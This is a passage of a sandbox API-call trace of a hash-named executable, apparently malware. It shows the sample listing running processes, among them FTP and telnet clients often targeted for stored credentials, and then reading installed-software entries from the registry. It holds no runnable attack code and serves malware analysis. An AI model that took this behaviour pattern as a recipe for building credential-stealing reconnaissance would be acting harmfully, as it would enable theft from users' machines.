th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0110.456] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.456] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e20 [0110.456] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.456] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.456] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e20 | out: hHeap=0x29a0000) returned 1 [0110.456] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0110.457] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.457] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f00 [0110.457] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.457] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.457] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.457] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0110.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.459] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970600 [0110.459] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.459] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0110.460] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.460] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ee0 [0110.460] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.460] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.460] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.460] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0110.461] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.461] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b80 [0110.461] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0110.461] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.461] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b80 | out: hHeap=0x29a0000) returned 1 [0110.462] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0110.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6908 [0110.463] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e00 [0110.463] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e00 | out: hHeap=0x29a0000) returned 1 [0110.463] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0110.464] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.464] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0110.465] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.465] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0110.466] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e80 | out: hHeap=0x29a0000) returned 1 [0110.466] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.467] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e80 | out: hHeap=0x29a0000) returned 1 [0110.467] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0110.468] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.468] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0110.469] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.469] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.471] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.471] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.473] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.473] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 1 [0110.474] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.474] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.475] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.475] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x19f35c, th32ProcessID=0x19f3a4, th32DefaultHeapID=0x29a122c, th32ModuleID=0x3b, cntThreads=0x19f27c, th32ParentProcessID=0x49bb00, pcPriClassBase=1700700, dwFlags=0x19f2ec, szExeFile="")) returned 0 [0110.476] CloseHandle (hObject=0x35c) returned 1 [0110.476] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.480] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.480] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea94 | out: phkResult=0x19ea94*=0x35c) returned 0x0 [0110.482] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x0, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.482] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook") returned 63 [0110.482] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.482] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.482] RegCloseKey (hKey=0x518) returned 0x0 [0110.482] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.482] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager") returned 70 [0110.482] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.483] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.483] RegCloseKey (hKey=0x518) returned 0x0 [0110.483] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x2, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.483] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx") returned 64 [0110.483] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.483] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.483] RegCloseKey (hKey=0x518) returned 0x0 [0110.483] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x3, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.483] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime") returned 63 [0110.483] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.483] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.483] RegCloseKey (hKey=0x518) returned 0x0 [0110.483] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x4, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.483] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore") returned 60 [0110.483] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.483] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.483] RegCloseKey (hKey=0x518) returned 0x0 [0110.483] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x5, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.483] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40") returned 56 [0110.484] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.484] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.484] RegCloseKey (hKey=0x518) returned 0x0 [0110.484] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x6, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.484] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data") returned 59 [0110.484] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.484] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.484] RegCloseKey (hKey=0x518) returned 0x0 [0110.484] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x7, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.484] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX") returned 60 [0110.484] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.484] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.484] RegCloseKey (hKey=0x518) returned 0x0 [0110.484] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x8, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.484] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData") returned 58 [0110.484] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.484] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.485] RegCloseKey (hKey=0x518) returned 0x0 [0110.485] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x9, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.485] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack") returned 68 [0110.485] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.485] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.485] RegCloseKey (hKey=0x518) returned 0x0 [0110.485] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xa, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.485] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2") returned 60 [0110.485] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.485] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.485] RegCloseKey (hKey=0x518) returned 0x0 [0110.485] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xb, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.485] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent") returned 67 [0110.485] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.485] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.485] RegCloseKey (hKey=0x518) returned 0x0 [0110.485] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xc, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.485] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC") returned 55 [0110.486] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.486] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x59, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.486] RegCloseKey (hKey=0x518) returned 0x0 [0110.486] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xd, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.486] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}") returned 90 [0110.486] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.486] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x19eaa4*=0x3f) returned 0x0 [0110.486] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.486] GetLastError () returned 0x12 [0110.486] SetLastError (dwErrCode=0x12) [0110.486] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="14.25.28508", lpcbData=0x19eaa4*=0xc) returned 0x0 [0110.486] GetLastError () returned 0x12 [0110.486] SetLastError (dwErrCode=0x12) [0110.486] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x3970048 [0110.486] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0110.486] GetLastError () returned 0x12 [0110.487] SetLastError (dwErrCode=0x12) [0110.487] GetLastError () returned 0x12 [0110.487] SetLastError (dwErrCode=0x12) [0110.487] GetLastError () returned 0x12 [0110.487] SetLastError (dwErrCode=0x12) [0110.487] RegCloseKey (hKey=0x518) returned 0x0 [0110.487] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xe, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.487] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}") returned 90 [0110.487] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 